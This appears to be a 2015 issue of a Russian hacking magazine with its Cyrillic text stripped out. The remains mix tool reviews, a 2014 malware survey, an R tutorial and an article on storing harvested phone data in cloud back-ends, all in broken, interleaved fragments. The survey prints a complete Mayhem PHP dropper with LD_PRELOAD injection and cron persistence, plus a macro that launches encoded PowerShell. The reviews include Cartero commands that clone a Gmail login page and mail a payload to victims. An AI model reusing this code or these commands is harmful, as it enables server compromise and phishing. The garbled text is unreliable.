;
JAR-,
exe (, exe4j, JSmooth,
Jar2Exe, Launch4j);
Unicode- ASCII- ;
overlay.

MalwaRE ,
PHP Laravel , ,

. MalwaRE
Adlice (www.adlice.com/softwares/
malware-repository-framework/),
.
:
(
PHP/MySQL-);
VirusTotal
( );
( AV,
, , );
URL
;
;

VirusTotal;
.

,
. ,
x86-.

Agafi/ROP (goo.gl/0W347j) EkoParty 2014.

portex.pom
portex.jar :

$ mvn install:install-le-Dle=portex.
jar -DpomFile=portex.pom
Wiki (https://github.com/katjahahn/
PortEx/wiki).


(
).
.

67

01 /192/ 2015

ANTI-ANTI-DEBUG

: Carbon Monoxide
: Windows
URL: https://bitbucket.org/NtQuery/scyllahide
ScyllaHide ,
, .

x64/x86-.

:

usermode .
ring 0 TitanHide (https://
bitbucket.org/mrexodia/titanhide).

4
ScyllaHide :
OllyDbg v1/v2;
x64_dbg;
Hex-Rays IDA v6+;
TitanEngine v2.
:
Process Environment Block (PEB);
NtSetInformationThread;
NtSetInformationProcess;

: npdunn
: Windows
URL: http://
sourceforge.
net/projects/
visualcodegrepp/

NtQuerySystemInformation;
NtQueryInformationProcess;
NtQueryObject;
NtYieldExecution;
NtCreateThreadEx;
BlockInput;
NtUserFindWindowEx;
NtUserBuildHwndList;
NtUserQueryWindow;
NtSetDebugFilterState;
NtClose;
Remove Debug Privileges;

Hardware Breakpoint Protection


(DRx);
Timing;
Raise Exception;
.

PE
x64

x64_dbg IDA. ,
ScyllaHide .
standalone .
(goo.gl/
hzY0hx).

: Matias P.
Brutti
: Linux
URL: https://github.
com/FreedomCoder/
Cartero

: clymb3r
: Windows
URL: https://github.
com/clymb3r/
KdExploitMe

MAILING PHISHING FRAMEWORK

KDEXPLOITME

VCG (Visual Code Grepper)


:
C++;
C#;
VB;
PHP;
Java;
PL/SQL.

Cartero CLI- Ruby.


Cartero ,
(,
Mailer, Cloner, Listener, AdminConsole),

.
,
gmail.com, :


. KdExploitMe ,

Windows .
, :
AttackWriteWhatWhere;
PoolOverflow;
AttackDecAddress;
KernelAdressLeak.


.
. , ,
,
.
, ,
.
:
, VCG.
, , . ,
, VCG, ,
grep .
.

./cartero Cloner --url https://


gmail.com --path /tmp--webserver
gmail_com./cartero Listener
--webserver /tmp/gmail_com -p 80
, Mailer
:

./cartero Mailer --data victims.json


--server gmail2 --subject "Internal
Memo" --htmlbody email_html.html --at
tachment payload.pdf --from "John Doe
<jdoe@company.com>"
Mongo, Cloner,
Listener, Servers, Templates, Mailer, WebMailer,
LinkedIn,
IMessage,
GoogleVoice,
Twilio,
AdminWeb, AdminConsole.
, .


. , .
ring 0 0day. ,
A Guide to Kernel Exploitation: Attacking the Core
:).
. Windows 7
Windows 8.1

Malware

01 /192/ 2015

,


.
.
? ?
malware? !

Lightspring@shutterstock.com

68

01 /192/ 2015

2014

69

JAVA,

Javafog , Java?

JRE, :
-
upload_* , ,
. . , Java, XOR
0x99 %server_url%/uploads/%file_name%;
. , cmd_UpdateDomain , Java, PC .
%TEMP%update.dat;
,
cmd_* , .
cmd.exe /c %%, ,
%server_url%/newsdetail.
Icefog, aspx?title=%host_id%.
.
Javafog,
Icefog, . IP-
, ,
,
. , .
,
, Icefog
, . -
Javafog , Icefog
, Java.
Icefog , ,
.
.
, 2014 .
Java-, .
DDoS-,
Icefog
Windows, Linux Mac OS. , Java. ( &):
JRE CVE-2013-2465.

Icefog 2011
tregubenko_v_v@tut.by
email, (Zoltan Balazs), CTO
;
MRG Effitas. Icefog 1 aspx-;
HEUR:Backdoor.Java.
Icefog 2 proxy;
Agent.a.
Icefog 3 & view.asp
update.asp;
,
Icefog 4 & upfile.asp;
Zelix Klassmaster. -, Zelix
Icefog-NG TCP- 5600 ( . Zelix
HTTP-).
, , ,
.
, OS X
%userprofile% Macfog.
. , , 2014 , ,
:
C&C Icefog lingdona.com, Windows HKEY_CURRENT_USER\Software\Microsoft\Windows\
, User-Agent
CurrentVersion\Run;
Java/1.7.0_40. ,
Linux /etc/init.d;
Java-. , Mac OS Mac OS launchd,
Icefog User-Agent

Internet Explorer.
.
, Javafog. , DDoS-
policyapplet.jar, , , %userprofile%
, , Javafog
jsuid.dat.
update.jar %TEMP%
, IRC, HKEY_CURRENT_USER\Software\Microsoft\Windows\
. CurrentVersion\Run.
IRC PircBot, .
,
. 1. User-Agent
.

70

Malware

01 /192/ 2015

DDoS-.
:
DDoS ( HTTP UDP flood);
;
;
DDoS .
HTTP flood User-Agent, ,
, . , , DDoS- (. 1).
, Java - . ,
-, JRE, : , , Java .

- Team Cymru ,
. , Team Cymru, ,
- DNS- . ,
DNS, .
, ,
.
, ,
. ,
, . , 2012 , Carna.
, OpenWRT.
Tripwire,
, , 80% -25 Amazon
, ,
. Tripwire, 30% 46%
,
.

, , . ? .
,

.
,

.
LINUX?
,
(. Government
, SOHO,
Communications Headquarters, GCHQ) , Linux
.
,
, .

. ,
, . 1919
SANS ,
Linksys.
(. Government Code and Cypher
*nix- The Moon,
School, GC&CS).
. ,
.

Lunar
1946 .
. , Industries The Moon 2009
GCHQ NSA,
*nix-
.
1952 . .
. ,
Windows 80 Tempora
: E4200, E3200, E3000,
, *nix E2500, E2100L, E2000, E1550,
-,
,
E1500, E1200, E1000 E900.
.

, E300,
.
WAG320N, WAP300N, WES610N,
2014 WAP610N, WRT610N, WRT400N,
WRT600N, WRT320N, WRT160N,
,
WRT150N.
*nix-.

ESET URL- "/HNAP1/", XML- , Windigo.
.
2011 ,
Home Network Administration Protocol, Cisco , cPanel ( . ) kernel.org,
, The
Linux.
Moon CGI- Windigo ESET CERT-Bund, . CGI- SNIC
, admin
(CERN).
, .
- , ELF
Linux,
(Executable and Linkable), MIPS.
,
The Moon . . 670
.
( /21 /24), .
Windigo
SANS, , :
, Linux/Ebury root backdoor shell, . ,
, . The Moon
SSH, Linux, FreeBSD-;
, ,
Linux/Cdorked - Linux,
SANS.
, , Windows,
. , 300 ? Apache httpd, nginx lighttpd;
.

GCHQ

01 /192/ 2015

71

2014

Linux/Onimiki DNS- Linux, ,


, IP-,
;
Perl/Calfbot -, Perl.

fclose($f);
}
print "SO dumped ".le_put_contents("./libworker.so",
$so)."\n";
if (getenv("MAYHEM_DEBUG"))
exit(0);
$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
/* second stage dropper */
$HBN=basename("/usr/bin/host");
$SCP=getcwd();
$SCR ="#!/bin/sh\ncd '".$SCP."'\nif [ -f
'./libworker.so' ];then killall -9 $HBN;
export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/
bin/host\nunset LD_PRELOAD\n";
$SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\
n\nrm 1.sh\nexit 0\n";
@le_put_contents("1.sh", $SCR);

-, Linux/Cdorked, Windows ( 2013- Blackhole,


Neutrino),
, Win32/Boaxxe.G Win32/
Glupteba.M, .
SSH ,
. SSH, Linux/Ebury:
.

Windigo,
.
. 2. Windigo
root,
- Perl/Calfbot.
( root)
Linux/Ebury.
-, Linux/Cdorked.
,
Linux/Cdorked, , 25 .
ESET ,
,
Windigo,
:
,
, ,
Linux.
,
Mayhem.

libworker.so, .
PHP-, -.

<?php
header("Content-type: text/plain");
print "2842123700\n";
if (! function_exists('le_put_con
tents')) {
function le_put_contents
($lename, $data) {
$f = @fopen($lename, 'w');
if (! $f)
return false;
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
@system("killall -9 ".basename("/usr/bin/host"));
$so32 = <hex_body_of_library_for_x32>;
$so64 = <hex_body_of_library_for_x64>;
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
$arch = 32;
print "Arch is ".$arch."\n";
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
$n = unpack("C*", fread($f, 8));
$so[7] = sprintf("%c", $n[8]);
print "System is ".($n[8] == 9 ? "FreeBSD" :
"Linux")."\n";

@chmod("1.sh", 0777);
/* try at now, le will be removed, crontab cleaned on suc
cess */
@system("at now -f 1.sh", $ret);
if ($ret == 0) {
for ($i = 0; $i < 5; $i++) {
if (! @le_exists("1.sh")) {
print "AT success\n";
exit(0);
}
sleep(1);
}
}
@system("(crontab -l|grep -v crontab;echo;echo '* * * * *
".$SCP."/1.sh')|crontab", $ret);
if ($ret == 0) {
for ($i = 0; $i < 62; $i++) {
if (! @le_exists("1.sh")) {
print "CRONTAB success\n";
exit(0);
}
sleep(1);
}

72

Malware

01 /192/ 2015

ELF IptabLes IptabLex. /boot,


PHP- ? : /usr. IptabLes ( 1 ) CMS ( Google
IptabLex ( 700 ), WordPress), , root.
. ,
.
FTP , FTP .
, .
, PHP- .
/etc/rc.d/
(x86 x64)
init.d, . . ,
-, Mayhem.
Linux, Debian, Ubuntu, CentOS Red Hat.
killall
DDoS SYN flood DNS flood. /usr/bin/host ( ) ,
(x86 x64).
system() /usr/bin/host 119 / 110 .
LD_PRELOAD=libworker.so, libworker.
, DDoS- 2014 .
so exit().
DDoS-
Mayhem .sd0,
Linux.BackDoor.Fgt.1.
FAT ,
. Linux. FAT16/32 File System Library (fat_filelib).
, MIPS SPARC.
.
:

IP- libworker.so ;
LD_PRELOAD
,
;
DNS amplification;
. UDP flood;
SYN flood;

;
Mayhem.
.
(. National Security Agency, NSA)


, ,
. -
.
, (. No Such Agency). : URL .
, NSA
,
256
. NSA
. IP-,
,
, . IP
, ,
,
,
, Mayhem
,
. , ,
.
.
, , ,
Telnet
, -, - , :

,
,
. .
Remote File Inclusion;
(root,
NSA SELinux,
admin), .
Linux.


Linux .
WordPress,
, ;

(root, admin, 12345). Joomla
WordPress;
IP-, ,


CMS- ISP-;
bash-, , ,
.
.
, ;
,
FTP-;
Linux-
IP-;
Windows, . , ...
- MySQL (phpMyAdmin);
POWERSHELL
Heartbleed ShellShock.
, . , , . .

Trend Micro Symantec . ,
,
1400 .
Microsoft Word Excel.
Akamai Technologies Crigent ( Power Worm).
Linux- IptabLes/IptabLex,
Windows PowerShell.
DDoS-. , , Microsoft Excel
Apache Struts, Apache Tomcat
:
Elasticsearch.

}
print "Running straight\n";
@system("./1.sh");?>

NSA

01 /192/ 2015

73

2014

Private Sub Workbook_Open()


b = "JwBDAEkWORMBODYHERE" _
& "QA7ACcAcgWORMBODYHERE" _
& "BzACgAKQAWORMBODYHERE" _
& "jAGUAIAAtWORMBODYHERE" _
& "ACAAUwB5AWORMBODYHERE" _
& "GcALgBpAGWORMBODYHERE" _
& "4AIAAtAGEWORMBODYHERE" _
& "AdAAuAHAAWORMBODYHERE"
Set a = CreateObject("WScript.Shell")
a.Run "powershell.exe" & " -noexit
-encodedcommand" & b, 0, False
End Sub

. 3. Poweliks
. 4. Poweliks

, , .
, .
, PowerShell- Base64, powershell.exe
. , , .
powershell.exe
- Base64 . ( ) ( ).
CompileAssemblyFromSource(), CSharp
. rundll32.exe , rundll32. ,
.
Crigent ,
Tor.
Dropbox OneDrive ,
, , Tor-, Polipo. : DNS DNS- Google nslookup -querytype=TXT
{malicious domain} 8.8.8.8,
Tor Polipo.
Tor , Crigent PowerShell . ,

. 5. Regin

, Word Excel
, , ,
. docx xlsx, Crigent
, doc xls , . ,
. , Power Worm.
Power Worm , PowerShell.
Poweliks. PowerShell, .
Poweliks ,
, , , .
Poweliks RTF CVE-2012-0158 ( Microsoft MS12-027).
PowerShell,
Microsoft KB968930.
(. 3).
, ASCII-;
, , (. 4).
JScript, \\HKCU\software\microsoft\windows\currentversion\run\(default).
JScript Base64- PowerShell- (,
Power Worm), . , , DLL, .
DLL, MPRESS 2.19, NtQueueApcThread dllhost.exe
. : -

74

Malware

NTFS Alternate Data Streams, , MoveFileEx() MOVEFILE_DELAY_UNTIL_REBOOT.


Poweliks, ,
.
, malware-, Kafeine ( malware.dontneedcoffee.com), , Poweliks Alureon.GQ (Microsoft),
Wowlik (ESET). ,
, , , TDL TDSS.
,
(,
,
). Kafeine ,
, C&C Poweliks, downgrade
, Alureon.GQ.
2014-
Poweliks
30 ( 2013 ). ,

Microsoft Word.

01 /192/ 2015

.
:
x86 NTFS Alternate Data Streams;
x86 FAT ;
x64 .

20 RC5 16-
NRV2e.
x86
VMEM.sys,

(EVFS). Regin,
,

- evt
imd,
, C:\Windows\System32.
- FAT, ,
,
16- 6
RC5
NRV2e. VMEM.sys . 6. Regin
EVFS-
disp.dll ( ),
-,
, Stuxnet.
,
- , , ? 2014 Symantec
.
Kaspersky white paper Regin.
x64 disp.dll,
- , .
EVFS, ? , . ( VMEM.sys), disp.dll , Symantec, Kaspersky (
EVFS, .
2014-. . .) (
:
). , HTTP HTTPS, cookie;
Regin, (. 5).
RAW sockets, TCP UDP;
, .
ICMP, ping shit,
64-
31 337;
Microsoft Broadcom. SMB.
CA ,
.
.
- Regin
Regin, . Regin
( ). x86- x64-.
.
x86 ( ),
, Regin , .
.
NTFS,
( :
) Alternate Data
Streams :
. 7. Stuxnet
%Windir%;
%Windir%\fonts;
%Windir%\cursors.
FAT,
.
,



. x64
,
. ,
,

, XOR.

() ,

01 /192/ 2015

75

2014

;
;
;
;
;
HTTP/SMTP/SMB.

, .
( ), . , .
. , Symantec
Regin 12 2013 . Microsoft 9 2011 . F-Secure
:
Regin 2009 . ,
(RAW) NTFS / , , 2003 .
;
IP- (TCPDump);
: , Stuxnet, Duqu Regin
;
. ,
LM database;
. MS Exchange;
.
IIS;
: AES , RC4 , ? ,

.
,
, Stuxnet.
GSM.
zero
victims (
.
patient zero, ,
).
70 , Stuxnet ?
, 2008
JAVA - ,
, ,
Ericsson OSS MML.
.
.
Symantec, 28%
.
ERP -
, Java Runtime Environment (
, 48%
),
.
: ,
.
IP-.
( ) , ,
, ,
: , .
( ) zero
, victims. ,
(.
,

. 6).
60- . ,
:
.
Symantec Domain A Foolad Technic
*nix-
- The Intercept
Engineering Co.;
.
Domain B Behpajooh Co. Elec
,
,
& Comp. Engineering;
?
Domain C Neda Industrial
, DDoS-
, Group;
, ,

Domain D Control-Gostar
.
(Secret Malware in European Union
Jahed Company;
,
Attack Linked to U. S. and British
Domain E Kalaye Electric Co.
, Java PowerShell
Intelligence).

,

. ,
, Foolad Technic Engineering Co.
.
NSA/GCHQ State sponsored malware, ,

, .
,
Stuxnet .
.
.
,
,
Belgacom GCHQ
Stuxnet

,
. , ,
. , (,
.
) :). , ,
.

. ,
.
.

, ! , ,
(fingerprint) , IP-,
, .
, email .
Stuxnet.
,
,


NSA/GCHQ. ,
-


fingerprint,
.
. Behpajooh Co. Elec & Comp. Engineering ,
, -
Stuxnet ,
, -.
.
Belgacom. , Stuxnet Symantec W32.
, -
Stuxnet Dossier ver. 1.4 2011 . ,
(Jean-Jacques Quisquater), , ,
. The Intercept Regin
Domain A, B, C, D, E?
NSA/GCHQ.
.

76

Malware

01 /192/ 2015

2014



][

(, )
- . ,
, .
:
:). , , . ! ,


.

,

][. ,
Node.
js, Erlang,

,
][,

,
Malware,
,

,


-

Deeonis,
-
Malware

,

++ , ,

,
Malware,


lozovsky@glc.ru

,

X-mobile, ,
Plan 9
:)

01 /192/ 2015

77

2014

, ,
WIN, MAC
( INTERNET SECURITY, )


. Linux Mint
,
Windows 7 x64,
,
.
,

PeStudio, . ,

, omodo
Nod32.

(Kaspersky),
,
, .

, ( ) - , .


security-, , .
,
-
. : ,
, , , :).
-
, , . Dr.Web, ESET, Essential, Avast .
- , -
(
). , ,
VirusTotal, - , . , ,
, ,
. KIS,
. ,
. ,
,
- .
,
, VirtualBox,
Kali, IDA, OllyDbg + ImmunityDebugger, VS, WinHex, PEiD,
ProcessExplorer, :).

KIS Dr.Web.
, ,

. 1998 :).
,
, ,
.


ArchLinux,
,
docker/lxc. Windows
, . - ,
, VirtualBox.


Windows, :
.
,
. , ,
. :).

Deeonis
,
Windows-,

Microsoft Security
Essentials. ,
. ,
Windows
MS,
MS.

:).
Security Essentials
, .
Microsoft ,

API.

78

Malware

01 /192/ 2015

:

. , ?

Deeonis

Android Dr.Web:
APK ,
SMS , .

Dr.Web. ,
, .
,

, , , ,
.

,
Windows Phone.

. Android (
1.5),
,
, -
- .
, .
,
,
Motorola Defy
SIM-
AOSP
Nexus 4. //
Avast. ,
. iOS, , .



(, , IDA
)

, , VirtualBox, Kali, IDA, OllyDbg +
ImmunityDebugger, VS, WinHex, PEiD, ProcessExplorer,
:). ? , ,
( , ...) . VirtualBox . Kali Linux must have,
, ,
, , . IDA + Olly + Immunity + PEiD
, , , . VS IDE
. WinHex , , ,
. ProcessExplorer ,
, .

01 /192/ 2015

79

2014


, , ( ) . , -
2000-,
, ,
, ,

, Norton Ghost
.
,

100% . ,
15

( 40 , - , :)).
,
,

. -
Debian,
OS X,
.
- , -

. , /sensitive
.
:
Dropbox;
Google Drive;
Amazon Glacier/S3;
Digital Ocean;
GitHub.
. , DB
fast-read ,
. Google
Drive , , ,
review. S3

,
Glacier. ,

,
,
,
.
, ,
. ,
-

, private
network SSL ,
bash-.
,
c
docker-,
, , (, , ,
Flash
,
). ,


backup- Time Machine. , :).
, , , :
?
!
,

. ,
.
ASAP
endpoint .

Deeonis

, .
backup-,
Comodo
Comodo Backup (
).
. ,
,
.


*nix . , , ,
iptables ,
. SELinux, ,
. docker/lxc, docker Chromium Tor.
. .
, , Hardened Gentoo ,
, , .


NoScript
Mozila. ,
.

80

Malware

01 /192/ 2015


/ / : ,

,


//,

,
.
(, , )
.
KIS

.
Avast.

: KIS. , ,
:),

. ( Core i3 Ivy
Bridge, 4 RAM, SSD),
.
Dr.Web Light.
Avast, .
Avast (, ,
:)) ,
.
Trend Micro,
, .
:).

,
, , :). ,
- .
Avast
omodo. Avast
. Comodo ,

,
.
Comodo,
. , ...

Deeonis


Windows Ubuntu.
, Nod32.
, , .
Dr.Web CureIt.


Ubuntu. 99% , , Wine.

01 /192/ 2015

2014

,
MALWARE
, . , , , . ,
IT, , .
, , , ,
USB-. ,
, .
, 50% malware ,
, , . : ,
temp, 90 malware . , , . ?
. ,
IT.
, ,
.
. , malware,
, ,
. , , . Kaspersky
Dr.Web .
, . Avast Avira,
.

. - Dr.Web :
, , . . , ,
. , 200 , .
Kaspersky . Kaspersky
, , . ,
- -
ESET,
, , . ,
.
,
, ,
, .
Avast , , ,
, .
Comodo , ,
.
sandbox,
.
sandbox , .

81

82






, R. R .

-
,
( ). , Shiny (shiny.rstudio.
com), - R.
, R , .
. -
, R
, , ,
:).
R,
(
), .

01 /192/ 2015


vitaly@betamind.ru

, ,

R , , . ,
, ? help,
.
, ? _ .

,
. ,
, ,
.

R ,
,
R , . , . ,
? , 10.
.
:
;
();
;
;
.
R , .
R, , , ,
L. , 10L.
:

> x <- 1
> typeof(x)
[1] "double"
> y <- 1L
> typeof(y)
[1] "integer"

, ,
: ,

, . ,

REPL (Read Evaluate Print Loop).
print
- .
, [1] 10,
R, , ( ) .
1
. ,
,

,
.
c:

> x <- c(1,2,3)


> x
[1] 1 2 3
,
, :

>, .

Inf .
<-. :

> x <- 10
> x
[1] 10
> print(x)
[1] 10

83

01 /192/ 2015

> x <- c(1:3)


> x
[1] 1 2 3
, ,
. , , . typeof.

x <- 1:3. R TRUE FALSE T F.
, vector.

> x <- vector("numeric", length = 10)


> x
[1] 0 0 0 0 0 0 0 0 0 0
> length(x)
[1] 10

R
:

> x
> x
[1]
> y
> y
[1]

<- c("a", TRUE, 1.3)


"a"
"TRUE" "1.3"
<- c(2, TRUE, FALSE)
2 1 0


.
:

> as(TRUE, "character")


[1] "TRUE"
> as.character(TRUE)
[1] "TRUE"
,

.
, , . (
) character(length=5),
length , is.character
, as.character
. ,
NA.
,
:

> v <- c(x = 1.0, y = 2.5, z = -0.1)


> v
x
y
z
1.0 2.5 -0.1

84

> u <- c(1.0, -0.5, -0.5)


> names(u) <- c("x", "y", "z")

,
.
matrix:

> m <- matrix(nrow = 2, ncol = 3)


> m
[,1] [,2] [,3]
[1,]
NA
NA
NA
[2,]
NA
NA
NA
, . , dim:

> dim(m)
[1] 2 3
> attributes(m)
$dim
[1] 2 3
, (, )
: , , C Java,
, , , ,
FORTRAN R. , ,
:

> m <- matrix(1:6, nrow = 2, ncol = 3)


> m
[,1] [,2] [,3]
[1,]
1
3
5
[2,]
2
4
6
, dim :

> v <- 1:6


> dim(v) <- c(2, 3)
> v
[,1] [,2] [,3]
[1,]
1
3
5
[2,]
2
4
6
,
:

> m <- matrix(1:4, nrow=2, ncol=2)


> dimnames(m) <- list(c("a", "b"),
c("c", "d"))
> m
c d
a 1 3
b 2 4
R
:

> x <- 1:3


> y <- 11:13
> cbind(x, y)
x y
[1,] 1 11
[2,] 2 12
[3,] 3 13
> rbind(x, y)
[,1] [,2] [,3]

01 /192/ 2015

x
y

1
11

2
12

3
13

, , ,
.



. , , . ,
.
, , ,
R :

> lst <- list("hello", 1.5, TRUE, 1+2i)


> lst
[[1]]
[1] "hello"
[[2]]
[1] 1.5
[[3]]
[1] TRUE
[[4]]
[1] 1+2i
, , : , , . ,
:

> l <- list(a="test", b=3.14)


> l
$a
[1] "test"
$b
[1] 3.14

. ,
,

. ,
. R

:

> x <- factor(c("yes", "no", "yes",


"no", "no"))
> x
[1] yes no yes no no
Levels: no yes
: yes no. ,
, , :

> table(x)
x
no yes
3
2

(DATA FRAME)
R.
, . ,

.
, (). -

CSV-
read.csv,
.
, :

> x <- data.frame(a=c(F, F, T, T),


b=c(F, T, F, T), or=c(F, T, T, T))
> x
a
b
or
1 FALSE FALSE FALSE
2 FALSE TRUE TRUE
3 TRUE FALSE TRUE
4 TRUE TRUE TRUE
names,
row.names:

> names(x)
[1] "a" "b" "or"
> row.names(x)
[1] "1" "2" "3" "4"


,
, ,
,
.
, , :

> x <- c(11, 21, 31, 41, 11, 21, 31)


> x[1]
[1] 11
> x[2]
[1] 21
> x[x > 21]
[1] 31 41 31
> j <- x > 21
> j
[1] FALSE FALSE TRUE TRUE FALSE
FALSE TRUE
> x[j]
[1] 31 41 31
> x[1:3]
[1] 11 21 31
, , , ,
>
, .

, . , x[2,3]
, x[1,]
z[,2]
.
, ,
, ,
- , ,
x[1, ,drop=FALSE].

. :

> l <- list(a=0.5, b=1:3)


> l$a
[1] 0.5
> l$b
[1] 1 2 3
> x <- l[2]
> x

01 /192/ 2015

85

$b
[1] 1 2 3
> typeof(x)
[1] "list"
> y <- l[[2]]
> typeof(y)
[1] "integer"
> y
[1] 1 2 3

R.
, [[]]
, []
. $ [[]] .
, $ .
,
, : x[[1]][[3]], ,
c. ,
x[[c(1, 3)]].

( ).


, R ,

.
,
, .
. , R ,
-:

if (x > 0) { y <- x } else { y <- -x }


, else . . ,

z <- if (x < 0) -x , x > 0 NULL.



is.null.
. R ,
, . R
. for,
for-in.

x <- c("a", "b", "c", "d", "e")


for(i in 1:5) {
print(x[i])
}
for(ch in x) print(ch)
, for-in , ,
- ,
,
.
R seq_along, ,
.
, for(i in seq_along(x)) { ... }.
,
seq_len.
, , length. while while (cond) { ... }.
R : &&, || !.
while(TRUE) R
repeat { ... }, , , if
break.
next.

R
.



Haskell, if , ,
, . R

:

y <- if (x > 0) { x } else { -x }


#

,
,
. else . ,

,
R .

?
:

f <- function(<args>) {
...
}
, R
(first-class

object). ,
. ()
:

f <- function(g) {
function(x) g(g(x))
}
y <- f(function(x) x * x)(5)
f g ,
x
g.

, (
g ) 5.
, 5
.
R
(lazy), , :

> f <- function(x, y) x * x


> f(3)
[1] 9
> f(3, 5/0)
[1] 9
,
<<-. :

counter <- function() {


i <- 0
function() {
i <<- i + 1
i
}
}

, :

> counter_one <- counter()


> counter_two <- counter()
> counter_one()
[1] 1
> counter_one()
[1] 2
> counter_two()
[1] 1
, ,
<<- ,
1.
R .

( ):

> f <- function(x, y=1) x + y


> f(y=2, x=5)
R
, .



R
.

86

01 /192/ 2015

MBAAS

( )
, .
backend as a service (BaaS)
,
BaaS Mobile BaaS
(MBaaS). MBaaS-
,

.
, ,
, .

MBaaS, .
, , , Angry
Birds, :).
. , Unity3D/C#, Windows, Android iOS. ,
-.
.
?

MBAAS

. ,
WPA
2011- , 28 .
.
Wikileaks ,
DDoS-. .

MBaaS-, Unity3D. BaaS-


, SDK Android iOS,
,
.

?
; , , , GPS. -
Unity3D
,

(Android, iOS, Windows Phone).
, :

#if UNITY_ANDROID
AndroidJavaObject TM = new AndroidJavaObject
("android.telephony.TelephonyManager");
string IMEI = TM.Call<string>("getDeviceId");
:

My Life Graphic@shutterstock.com


infiltration.ru

MBaaS- , :
1. MBaaS-.
2. ,
, .
3. .
4. , .
5. API (
) .
6. MBaaS , .

01 /192/ 2015

87

MBaaS

string IMEI = SystemInfo.deviceUniqueIdentier;

(delegate(ActionUserSignin action) {
if(action.getCode() == StatusCodes.SUCCESS) {
//
// ...
} });

READ_PHONE_STATE, .


MBaaS-, , ,

:
, ,
.

GameSparks.com
The #1 Backend-as-a-Service platform
for games, . ,
, SDK unitypackage
.
: API Key API Secret
( ),
. Unity3D GameSparks.
: iOS, Android,
JavaScript, Marmalade, Cocos2d, Flash . Unity3D
SDK, , , : , , ,
. Unity SDK 2 GameSparks
,
.

NGUI . ,
, NoSQL,
, , .
GameSparks : . , MBaaS-
.
GameSparks
20 , 20
20 API .
, .

WARNING
,


,

,

,
- .

,


MBaaS-,

KumakoreApp app = new KumakoreApp


("b99418973e694ec8ce45a53bf712a79", "0.0", 1415103791);
:

app.signin("kumasun3157","password").sync

//
Dictionary<string,object> data = new
Dictionary<string, object>();
data.Add("phone_num", "123-45-67");
//
.

string type = "phone";
string name = "lox";
ActionDatastoreCreate action2 = app.getUser()
.getDatastore().create(type, name, data);
action2.sync(delegate(ActionDatastoreCreate a) {
if(a.getCode() == StatusCodes.SUCCESS) {
//
!
} });
( )
,
, . , : 500 API
push- .

Kii.com
, .
- . , , (
), .
SDK , , , , . SDK DLL, JSON-.
Assets ,
.
Application ID, Application Key Site
( ).
.

Kumakore.com
SDK Unity, Android, iOS, , , REST API. ,
SDK GitHub . Unity3D
: SDK unitypackage,
. . Hello world . (
), .
Kumakore , ,
:

Kumakore ,
, .
Global Object, . app
getUser(), getDatastore()

:

INFO



,
, ,

Droid Watcher
Android Spy Application
GitHub.

KiiUser user = KiiUser.BuilderWithName


("username").Build ();
user.Register("password", (KiiUser user2,
Exception e) =>
{
if (e != null)

{ //
return;
}
//
!
});
JSON-.
.

KiiBucket bucket = Kii.Bucket("spy_table");


// , :
KiiObject kiiObj = bucket.NewKiiObject();
kiiObj["phone_num"] = "123-45-67";

88

01 /192/ 2015

kiiObj["money"] = 500;
kiiObj.Save((KiiObject obj, Exception e) =>
{
if (e != null)
{
//
}
else
{
//
!
}
});

, JavaScript. , ( , ),
:

KiiServerCodeEntry entry = Kii.


ServerCodeEntry("main");
entry.Execute(...);
1
API push-
.

. 1. ,
Yahoo

DatabaseObject obj_db = new DatabaseObject();


obj_db.Set("phone_num", "123-45-67");
obj_db.Set("money", 500);

3- . Gamesnet.Yahoo.net
PlayerIO.com, Yahoo
, ,
150 . Yahoo Games Network,
,
- PlayerIO.
Android Java, iOS/Objective-C, Unity3D/.NET,
ActionScript. , ,
,
ActionScript, , , . Visual Studio 2010.
. Yahoo NoSQL-
BigDB. Yahoo
. BigDB
(, xtable).
,
,
.
SDK Unity3D
, DLL
PlayerIOUnity3DClient.dll.

PlayerIOClient.PlayerIO.Connect(
"test-emwr9sy8ohefq9ce7mbsb7",
"public",
"user-id",
null,
null,
null,
delegate(Client client) {
//
},
delegate(PlayerIOError error) {
//

Debug.Log(error.Message);
});
Game ID ( "user-id").

.

client.BigDB.CreateObject("xtable",
"user-id", obj_db,
delegate (DatabaseObject result)
{ result.Save(null); });
Yahoo.

,
. ,

Yahoo.

Visual Studio, DLL,

. , , .

2- . Api.Shephertz.com (App42)
. 2. ,
App42

- : ,

01 /192/ 2015

89

MBaaS

. :
,
.
App42 Cloud API , .
: (, ,
, , , , ,
) ( , ,
, -,
, ).
.
App42
JSON- SDK,
SimpleJSON.
,
-
.

. 3. ,
Parse

ServiceAPI cloudAPI;
StorageService storageService;
try
{
//
:
cloudAPI = new ServiceAPI
("27bba692c71f3ece89767", "05747459e61b39");
//



:
storageService = cloudAPI.BuildStorageService();
}
catch(Exception)
{ //
storageService = null;
}

TestObject , Data Parse .



Parse:

ParseQuery<ParseObject> query = ParseObject.


GetQuery("TestObject");
query.GetAsync("v3unymsLIv").ContinueWith(t =>
{
ParseObject testObj = t.Result;
Debug.Log(testObj["phone"]);
});
GetAsync()
(objectId), .
JavaScript,
. ,
Parse.com : 20 , 2 , 30
API (2,67 ) .

try {
JSONClass jsonobj = new JSONClass();
jsonobj.Add("phone_num", "123-45-67");
jsonobj.Add("money", 500);
//
spy_table
spy_info:
storageService.InsertJSONDocument
("spy_table","spy_info", jsonobj);
//
!
}
catch(App42Exception )
{
//
}

Java.
API , push-, 1
1

1- . Parse.com
,
, .
2011 ,
, Parse 85
, . , Dropbox, Google Yahoo!
Parse.com .
, Parse,
Keys . Unity3D,
Parse.Unity.dll. , Parse Initializer Application ID .NET Key.
,

Parse:

ParseObject testObject = new


ParseObject("TestObject");
testObject["phone"] = "123-45-67";
testObject["money"] = 500;
testObject.SaveAsync();

WWW
MBaaS:
appcelerator.com
(iOS, Android, Titanium,
REST API);
kumulos.com
(iOS, Android);
kinvey.com
(iOS, Android, HTML5,
REST API)

. , , QuickBlox,
Unity3D, -
Amazon S3. ,
Asset bundles Pro Unity.
, Unity3D,
REST
API. , , Google Cloud, Amazon Cognito
iOS, Android Fire.
gamedev Photon (exitgames.com),
Photon Cloud , - PC-.
3D-
,
. ,
.
, ,
.
Photon, .

90

01 /192/ 2015


,

BOEING

EIFFEL
,
, Eiffel.
.

, ,
. -
Eiffel, 1985 .
( ), ,
, ,
( -).
ISE
